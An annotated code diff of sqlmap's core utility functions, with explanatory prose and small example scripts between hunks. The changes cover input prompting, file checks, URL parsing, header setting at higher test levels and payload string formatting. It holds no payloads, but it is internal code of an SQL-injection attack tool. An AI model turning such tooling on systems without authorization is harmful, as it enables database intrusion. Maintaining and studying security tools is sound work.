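                # dump continues; the row simply is not persisted
                logger.error("no space left on output device")
            else:
                raise  # unrelated I/O problems still propagate

    # usage: write_chunk(open("dump.csv", "ab"), b"row\n")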
@@ -846,8 +871,13 @@ def dataToOutFile(filename, data):
     if data:
         retVal = os.path.join(conf.filePath, filePathToSafeString(filename))

-        with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
-            f.write(data)
+        try:
+            with open(retVal, "w+b") as f:
+                f.write(data)
+        except IOError, ex:
+            errMsg = "something went wrong while trying to write "
+            errMsg += "to the output file ('%s')" % ex.message
+            raise SqlmapGenericException(errMsg)

     return retVal

@@ -866,11 +896,11 @@ def readInput(message, default=None, checkBatch=True):
     elif message[-1] == ']':
         message += " "

-    if kb.prependFlag:
+    if kb.get("prependFlag"):
         message = "\n%s" % message
         kb.prependFlag = False

-    if conf.answers:
+    if conf.get("answers"):
         for item in conf.answers.split(','):
             question = item.split('=')[0].strip()
             answer = item.split('=')[1] if len(item.split('=')) > 1 else None
@@ -886,7 +916,7 @@ def readInput(message, default=None, checkBatch=True):
                break

    if retVal is None:
-        if checkBatch and conf.batch:
+        if checkBatch and conf.get("batch"):
            if isListLike(default):
                options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
            elif default:
@@ -902,12 +932,16 @@ def readInput(message, default=None, checkBatch=True):
            retVal = default
        else:
            logging._acquireLock()
+
+            if conf.get("beep"):
+                beep()
+
            dataToStdout("\r%s" % message, forceOutput=True, bold=True)
            kb.prependFlag = False

            try:
                retVal = raw_input() or default
-                retVal = getUnicode(retVal, system=True) if retVal else retVal
+                retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal
            except:
                time.sleep(0.05)  # Reference: http://www.gossamer-threads.com/lists/python/python/781893
                kb.prependFlag = True
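readInput() now guards optional knowledge-base and configuration keys with .get(), beeps before prompting when the beep option is set, and decodes the typed answer with the real stdin encoding. The answer-resolution order itself is unchanged: a matching --answers entry wins, then --batch falls back to the default. A rough standalone model of that resolution order (function and argument names are illustrative, not sqlmap's API):

    def resolve_answer(message, default=None, answers="", batch=False):
        # --answers="question=value,other=value" takes precedence
        for item in (answers or "").split(','):
            if not item:
                continue
            question = item.split('=')[0].strip()
            answer = item.split('=')[1] if len(item.split('=')) > 1 else None
            if question and question.lower() in message.lower():
                return answer
        # --batch silently accepts the suggested default
        if batch:
            return default
        return None  # the real function would prompt interactively here

    print(resolve_answer("continue? [y/N] ", default="N", answers="continue=Y"))  # Y
    print(resolve_answer("continue? [y/N] ", default="N", batch=True))            # N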
@@ -974,13 +1008,33 @@ def sanitizeStr(value):

     return getUnicode(value).replace("\n", " ").replace("\r", "")

+def getHeader(headers, key):
+    retVal = None
+    for _ in (headers or {}):
+        if _.upper() == key.upper():
+            retVal = headers[_]
+            break
+    return retVal
+
 def checkFile(filename):
     """
-    Checks for file existence
+    Checks for file existence and readability
     """

-    if not os.path.isfile(filename):
-        raise SqlmapFilePathException("unable to read file '%s'" % filename)
+    valid = True
+
+    if filename is None or not os.path.isfile(filename):
+        valid = False
+
+    if valid:
+        try:
+            with open(filename, "rb"):
+                pass
+        except:
+            valid = False
+
+    if not valid:
+        raise SqlmapSystemException("unable to read file '%s'" % filename)

 def banner():
     """
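The new getHeader() helper performs a case-insensitive lookup of an HTTP header name, and checkFile() now also verifies that the file can actually be opened for reading before raising SqlmapSystemException. For illustration, a quick case-insensitive lookup in the same spirit (the header values below are made up):

    def get_header(headers, key):
        # case-insensitive header lookup, mirroring the helper added above
        for name in (headers or {}):
            if name.upper() == key.upper():
                return headers[name]
        return None

    headers = {"Content-Type": "text/html", "X-Powered-By": "PHP/5.4"}
    print(get_header(headers, "content-type"))  # text/html
    print(get_header(headers, "Server"))        # None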
@ -1046,13 +1100,18 @@ def setPaths():
|
||||||
paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
|
paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
|
||||||
paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
|
paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
|
||||||
paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
|
paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
|
||||||
paths.SQLMAP_OUTPUT_PATH = paths.get("SQLMAP_OUTPUT_PATH", os.path.join(os.path.expanduser("~"), ".sqlmap", "output"))
|
paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
|
||||||
|
|
||||||
|
_ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap")
|
||||||
|
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
|
||||||
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
|
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
|
||||||
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
|
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
|
||||||
|
|
||||||
# sqlmap files
|
# sqlmap files
|
||||||
paths.SQLMAP_HISTORY = os.path.join(os.path.expanduser('~'), ".sqlmap_history")
|
paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
|
||||||
|
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
|
||||||
|
paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
|
||||||
|
paths.GITHUB_HISTORY = os.path.join(_, "github.hst")
|
||||||
paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
|
paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
|
||||||
paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
|
paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
|
||||||
paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
|
paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
|
||||||
|
@ -1062,8 +1121,7 @@ def setPaths():
|
||||||
paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
|
paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
|
||||||
paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
|
paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
|
||||||
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
|
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
|
||||||
paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
|
paths.BOUNDARIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "boundaries.xml")
|
||||||
paths.INJECTIONS_XML = os.path.join(paths.SQLMAP_XML_PATH, "injections.xml")
|
|
||||||
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
|
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
|
||||||
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
|
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
|
||||||
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
|
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
|
||||||
|
@ -1072,6 +1130,10 @@ def setPaths():
|
||||||
paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
|
paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
|
||||||
paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
|
paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
|
||||||
|
|
||||||
|
for path in paths.values():
|
||||||
|
if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")):
|
||||||
|
checkFile(path)
|
||||||
|
|
||||||
def weAreFrozen():
|
def weAreFrozen():
|
||||||
"""
|
"""
|
||||||
Returns whether we are frozen via py2exe.
|
Returns whether we are frozen via py2exe.
|
||||||
|
@ -1131,7 +1193,7 @@ def parseTargetDirect():
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
for dbmsName, data in DBMS_DICT.items():
|
for dbmsName, data in DBMS_DICT.items():
|
||||||
if conf.dbms in data[0]:
|
if dbmsName == conf.dbms or conf.dbms.lower() in data[0]:
|
||||||
try:
|
try:
|
||||||
if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):
|
if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):
|
||||||
if remote:
|
if remote:
|
||||||
|
@ -1142,7 +1204,9 @@ def parseTargetDirect():
|
||||||
conf.hostname = "localhost"
|
conf.hostname = "localhost"
|
||||||
conf.port = 0
|
conf.port = 0
|
||||||
elif not remote:
|
elif not remote:
|
||||||
errMsg = "missing remote connection details"
|
errMsg = "missing remote connection details (e.g. "
|
||||||
|
errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' "
|
||||||
|
errMsg += "or 'access://DATABASE_FILEPATH')"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
|
if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
|
||||||
|
@ -1172,7 +1236,7 @@ def parseTargetDirect():
|
||||||
pass
|
pass
|
||||||
else:
|
else:
|
||||||
errMsg = "sqlmap requires '%s' third-party library " % data[1]
|
errMsg = "sqlmap requires '%s' third-party library " % data[1]
|
||||||
errMsg += "in order to directly connect to the database "
|
errMsg += "in order to directly connect to the DBMS "
|
||||||
errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2])
|
errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2])
|
||||||
errMsg += ". Alternative is to use a package 'python-sqlalchemy' "
|
errMsg += ". Alternative is to use a package 'python-sqlalchemy' "
|
||||||
errMsg += "with support for dialect '%s' installed" % data[3]
|
errMsg += "with support for dialect '%s' installed" % data[3]
|
||||||
|
@ -1193,7 +1257,8 @@ def parseTargetUrl():
|
||||||
errMsg += "on this platform"
|
errMsg += "on this platform"
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
if not re.search("^http[s]*://", conf.url, re.I):
|
if not re.search("^http[s]*://", conf.url, re.I) and \
|
||||||
|
not re.search("^ws[s]*://", conf.url, re.I):
|
||||||
if ":443/" in conf.url:
|
if ":443/" in conf.url:
|
||||||
conf.url = "https://" + conf.url
|
conf.url = "https://" + conf.url
|
||||||
else:
|
else:
|
||||||
|
@ -1202,7 +1267,14 @@ def parseTargetUrl():
|
||||||
if CUSTOM_INJECTION_MARK_CHAR in conf.url:
|
if CUSTOM_INJECTION_MARK_CHAR in conf.url:
|
||||||
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
|
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
|
||||||
|
|
||||||
|
try:
|
||||||
urlSplit = urlparse.urlsplit(conf.url)
|
urlSplit = urlparse.urlsplit(conf.url)
|
||||||
|
except ValueError, ex:
|
||||||
|
errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, ex)
|
||||||
|
errMsg += "Please be sure that you don't have any leftover characters (e.g. '[' or ']') "
|
||||||
|
errMsg += "in the hostname part"
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))
|
hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))
|
||||||
|
|
||||||
conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"
|
conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"
|
||||||
|
@ -1214,6 +1286,8 @@ def parseTargetUrl():
|
||||||
|
|
||||||
try:
|
try:
|
||||||
_ = conf.hostname.encode("idna")
|
_ = conf.hostname.encode("idna")
|
||||||
|
except LookupError:
|
||||||
|
_ = conf.hostname.encode(UNICODE_ENCODING)
|
||||||
except UnicodeError:
|
except UnicodeError:
|
||||||
_ = None
|
_ = None
|
||||||
|
|
||||||
|
@ -1238,13 +1312,13 @@ def parseTargetUrl():
|
||||||
conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
|
conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
|
||||||
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
|
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
|
||||||
|
|
||||||
if not conf.referer and intersect(REFERER_ALIASES, conf.testParameter, True):
|
if not conf.referer and (intersect(REFERER_ALIASES, conf.testParameter, True) or conf.level >= 3):
|
||||||
debugMsg = "setting the HTTP Referer header to the target URL"
|
debugMsg = "setting the HTTP Referer header to the target URL"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
|
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
|
||||||
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url))
|
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, "")))
|
||||||
|
|
||||||
if not conf.host and intersect(HOST_ALIASES, conf.testParameter, True):
|
if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5):
|
||||||
debugMsg = "setting the HTTP Host header to the target URL"
|
debugMsg = "setting the HTTP Host header to the target URL"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders)
|
conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders)
|
||||||
|
@ -1273,7 +1347,7 @@ def expandAsteriskForColumns(expression):
|
||||||
if expression != conf.query:
|
if expression != conf.query:
|
||||||
conf.db = db
|
conf.db = db
|
||||||
else:
|
else:
|
||||||
expression = re.sub(r"([^\w])%s" % conf.tbl, "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
|
expression = re.sub(r"([^\w])%s" % re.escape(conf.tbl), "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
|
||||||
else:
|
else:
|
||||||
conf.db = db
|
conf.db = db
|
||||||
conf.db = safeSQLIdentificatorNaming(conf.db)
|
conf.db = safeSQLIdentificatorNaming(conf.db)
|
||||||
|
@ -1501,39 +1575,55 @@ def normalizePath(filepath):
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
def safeExpandUser(filepath):
|
||||||
|
"""
|
||||||
|
Patch for a Python Issue18171 (http://bugs.python.org/issue18171)
|
||||||
|
"""
|
||||||
|
|
||||||
|
retVal = filepath
|
||||||
|
|
||||||
|
try:
|
||||||
|
retVal = os.path.expanduser(filepath)
|
||||||
|
except UnicodeDecodeError:
|
||||||
|
_ = locale.getdefaultlocale()
|
||||||
|
retVal = getUnicode(os.path.expanduser(filepath.encode(_[1] if _ and len(_) > 1 else UNICODE_ENCODING)))
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
def safeStringFormat(format_, params):
|
def safeStringFormat(format_, params):
|
||||||
"""
|
"""
|
||||||
Avoids problems with inappropriate string format strings
|
Avoids problems with inappropriate string format strings
|
||||||
|
|
||||||
>>> safeStringFormat('foobar%d%s', ('1', 2))
|
>>> safeStringFormat('SELECT foo FROM %s LIMIT %d', ('bar', '1'))
|
||||||
u'foobar12'
|
u'SELECT foo FROM bar LIMIT 1'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if format_.count(PAYLOAD_DELIMITER) == 2:
|
if format_.count(PAYLOAD_DELIMITER) == 2:
|
||||||
_ = format_.split(PAYLOAD_DELIMITER)
|
_ = format_.split(PAYLOAD_DELIMITER)
|
||||||
_[1] = _[1].replace("%d", "%s")
|
_[1] = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", _[1])
|
||||||
retVal = PAYLOAD_DELIMITER.join(_)
|
retVal = PAYLOAD_DELIMITER.join(_)
|
||||||
else:
|
else:
|
||||||
retVal = format_.replace("%d", "%s")
|
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", format_)
|
||||||
|
|
||||||
if isinstance(params, basestring):
|
if isinstance(params, basestring):
|
||||||
retVal = retVal.replace("%s", params, 1)
|
retVal = retVal.replace("%s", params, 1)
|
||||||
elif not isListLike(params):
|
elif not isListLike(params):
|
||||||
retVal = retVal.replace("%s", str(params), 1)
|
retVal = retVal.replace("%s", str(params), 1)
|
||||||
else:
|
else:
|
||||||
count, index = 0, 0
|
start, end = 0, len(retVal)
|
||||||
if retVal.count("%s") == len(params):
|
match = re.search(r"%s(.+)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), retVal)
|
||||||
while index != -1:
|
if match and PAYLOAD_DELIMITER not in match.group(1):
|
||||||
index = retVal.find("%s")
|
start, end = match.start(), match.end()
|
||||||
if index != -1:
|
if retVal.count("%s", start, end) == len(params):
|
||||||
retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:]
|
for param in params:
|
||||||
count += 1
|
index = retVal.find("%s", start)
|
||||||
|
retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:]
|
||||||
else:
|
else:
|
||||||
count = 0
|
count = 0
|
||||||
while True:
|
while True:
|
||||||
match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
|
match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
|
||||||
if match:
|
if match:
|
||||||
if count > len(params):
|
if count >= len(params):
|
||||||
raise Exception("wrong number of parameters during string formatting")
|
raise Exception("wrong number of parameters during string formatting")
|
||||||
else:
|
else:
|
||||||
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)
|
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)
|
||||||
|
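The reworked safeStringFormat() above only rewrites %d markers that stand alone (so a literal %d inside payload content is left untouched) and, when the format string carries a payload between PAYLOAD_DELIMITER markers, it counts and substitutes %s placeholders only inside that delimited region. The updated doctest already shows the intended behaviour; a plain-Python approximation of the standalone-%d rewrite, not sqlmap's implementation, is:

    import re

    def loose_format(format_, params):
        # rewrite only standalone %d markers to %s, then substitute left to right
        fixed = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", format_)
        for param in params:
            fixed = fixed.replace("%s", str(param), 1)
        return fixed

    print(loose_format("SELECT foo FROM %s LIMIT %d", ("bar", "1")))  # SELECT foo FROM bar LIMIT 1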
@ -1671,13 +1761,17 @@ def getConsoleWidth(default=80):
|
||||||
width = int(os.getenv("COLUMNS"))
|
width = int(os.getenv("COLUMNS"))
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
process = execute("stty size", shell=True, stdout=PIPE, stderr=PIPE)
|
try:
|
||||||
|
FNULL = open(os.devnull, 'w')
|
||||||
|
except IOError:
|
||||||
|
FNULL = None
|
||||||
|
process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE)
|
||||||
stdout, _ = process.communicate()
|
stdout, _ = process.communicate()
|
||||||
items = stdout.split()
|
items = stdout.split()
|
||||||
|
|
||||||
if len(items) == 2 and items[1].isdigit():
|
if len(items) == 2 and items[1].isdigit():
|
||||||
width = int(items[1])
|
width = int(items[1])
|
||||||
except OSError:
|
except (OSError, MemoryError):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
if width is None:
|
if width is None:
|
||||||
|
@ -1708,8 +1802,14 @@ def parseXmlFile(xmlFile, handler):
|
||||||
Parses XML file by a given handler
|
Parses XML file by a given handler
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
try:
|
||||||
with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
|
with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
|
||||||
parse(stream, handler)
|
parse(stream, handler)
|
||||||
|
except (SAXParseException, UnicodeError), ex:
|
||||||
|
errMsg = "something seems to be wrong with "
|
||||||
|
errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, ex)
|
||||||
|
errMsg += "sure that you haven't made any changes to it"
|
||||||
|
raise SqlmapInstallationException, errMsg
|
||||||
|
|
||||||
def getSQLSnippet(dbms, sfile, **variables):
|
def getSQLSnippet(dbms, sfile, **variables):
|
||||||
"""
|
"""
|
||||||
|
@ -1749,7 +1849,7 @@ def getSQLSnippet(dbms, sfile, **variables):
|
||||||
if choice and choice[0].lower() == "y":
|
if choice and choice[0].lower() == "y":
|
||||||
for var in variables:
|
for var in variables:
|
||||||
msg = "insert value for variable '%s': " % var
|
msg = "insert value for variable '%s': " % var
|
||||||
val = readInput(msg)
|
val = readInput(msg, default="")
|
||||||
retVal = retVal.replace(r"%%%s%%" % var, val)
|
retVal = retVal.replace(r"%%%s%%" % var, val)
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
@ -1763,7 +1863,7 @@ def readCachedFileContent(filename, mode='rb'):
|
||||||
with kb.locks.cache:
|
with kb.locks.cache:
|
||||||
if filename not in kb.cache.content:
|
if filename not in kb.cache.content:
|
||||||
checkFile(filename)
|
checkFile(filename)
|
||||||
with codecs.open(filename, mode, UNICODE_ENCODING) as f:
|
with openFile(filename, mode) as f:
|
||||||
kb.cache.content[filename] = f.read()
|
kb.cache.content[filename] = f.read()
|
||||||
|
|
||||||
return kb.cache.content[filename]
|
return kb.cache.content[filename]
|
||||||
|
@ -1828,7 +1928,7 @@ def initCommonOutputs():
|
||||||
kb.commonOutputs = {}
|
kb.commonOutputs = {}
|
||||||
key = None
|
key = None
|
||||||
|
|
||||||
with codecs.open(paths.COMMON_OUTPUTS, 'r', UNICODE_ENCODING) as f:
|
with openFile(paths.COMMON_OUTPUTS, 'r') as f:
|
||||||
for line in f.readlines(): # xreadlines doesn't return unicode strings when codec.open() is used
|
for line in f.readlines(): # xreadlines doesn't return unicode strings when codec.open() is used
|
||||||
if line.find('#') != -1:
|
if line.find('#') != -1:
|
||||||
line = line[:line.find('#')]
|
line = line[:line.find('#')]
|
||||||
|
@ -1854,7 +1954,8 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
|
||||||
|
|
||||||
checkFile(filename)
|
checkFile(filename)
|
||||||
|
|
||||||
with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
|
try:
|
||||||
|
with openFile(filename, 'r', errors="ignore") if unicode_ else open(filename, 'r') as f:
|
||||||
for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
|
for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
|
||||||
if commentPrefix:
|
if commentPrefix:
|
||||||
if line.find(commentPrefix) != -1:
|
if line.find(commentPrefix) != -1:
|
||||||
|
@ -1879,6 +1980,10 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
|
||||||
retVal[line] = True
|
retVal[line] = True
|
||||||
else:
|
else:
|
||||||
retVal.append(line)
|
retVal.append(line)
|
||||||
|
except (IOError, OSError, MemoryError), ex:
|
||||||
|
errMsg = "something went wrong while trying "
|
||||||
|
errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
return retVal if not unique else retVal.keys()
|
return retVal if not unique else retVal.keys()
|
||||||
|
|
||||||
|
@ -1987,7 +2092,7 @@ def getPartRun(alias=True):
|
||||||
else:
|
else:
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def getUnicode(value, encoding=None, system=False, noneToNull=False):
|
def getUnicode(value, encoding=None, noneToNull=False):
|
||||||
"""
|
"""
|
||||||
Return the unicode representation of the supplied value:
|
Return the unicode representation of the supplied value:
|
||||||
|
|
||||||
|
@ -2003,10 +2108,9 @@ def getUnicode(value, encoding=None, system=False, noneToNull=False):
|
||||||
return NULL
|
return NULL
|
||||||
|
|
||||||
if isListLike(value):
|
if isListLike(value):
|
||||||
value = list(getUnicode(_, encoding, system, noneToNull) for _ in value)
|
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
|
||||||
return value
|
return value
|
||||||
|
|
||||||
if not system:
|
|
||||||
if isinstance(value, unicode):
|
if isinstance(value, unicode):
|
||||||
return value
|
return value
|
||||||
elif isinstance(value, basestring):
|
elif isinstance(value, basestring):
|
||||||
|
@ -2014,17 +2118,15 @@ def getUnicode(value, encoding=None, system=False, noneToNull=False):
|
||||||
try:
|
try:
|
||||||
return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
|
return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
|
||||||
except UnicodeDecodeError, ex:
|
except UnicodeDecodeError, ex:
|
||||||
|
try:
|
||||||
|
return unicode(value, UNICODE_ENCODING)
|
||||||
|
except:
|
||||||
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
|
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
return unicode(value)
|
return unicode(value)
|
||||||
except UnicodeDecodeError:
|
except UnicodeDecodeError:
|
||||||
return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
|
return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
|
||||||
else:
|
|
||||||
try:
|
|
||||||
return getUnicode(value, sys.getfilesystemencoding() or sys.stdin.encoding)
|
|
||||||
except:
|
|
||||||
return getUnicode(value, UNICODE_ENCODING)
|
|
||||||
|
|
||||||
def longestCommonPrefix(*sequences):
|
def longestCommonPrefix(*sequences):
|
||||||
"""
|
"""
|
||||||
|
@ -2179,7 +2281,7 @@ def findMultipartPostBoundary(post):
|
||||||
candidates = []
|
candidates = []
|
||||||
|
|
||||||
for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""):
|
for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""):
|
||||||
_ = match.group(1)
|
_ = match.group(1).strip().strip('-')
|
||||||
if _ in done:
|
if _ in done:
|
||||||
continue
|
continue
|
||||||
else:
|
else:
|
||||||
|
@ -2380,7 +2482,11 @@ def extractTextTagContent(page):
|
||||||
[u'Title', u'foobar']
|
[u'Title', u'foobar']
|
||||||
"""
|
"""
|
||||||
|
|
||||||
page = re.sub(r"(?si)[^\s>]*%s[^<]*" % REFLECTED_VALUE_MARKER, "", page or "")
|
page = page or ""
|
||||||
|
|
||||||
|
if REFLECTED_VALUE_MARKER in page:
|
||||||
|
page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page)
|
||||||
|
|
||||||
return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
|
return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
|
||||||
|
|
||||||
def trimAlphaNum(value):
|
def trimAlphaNum(value):
|
||||||
|
@ -2440,6 +2546,9 @@ def findDynamicContent(firstPage, secondPage):
|
||||||
are dynamic, proper markings will be made
|
are dynamic, proper markings will be made
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
if not firstPage or not secondPage:
|
||||||
|
return
|
||||||
|
|
||||||
infoMsg = "searching for dynamic content"
|
infoMsg = "searching for dynamic content"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
@ -2490,11 +2599,11 @@ def removeDynamicContent(page):
|
||||||
if prefix is None and suffix is None:
|
if prefix is None and suffix is None:
|
||||||
continue
|
continue
|
||||||
elif prefix is None:
|
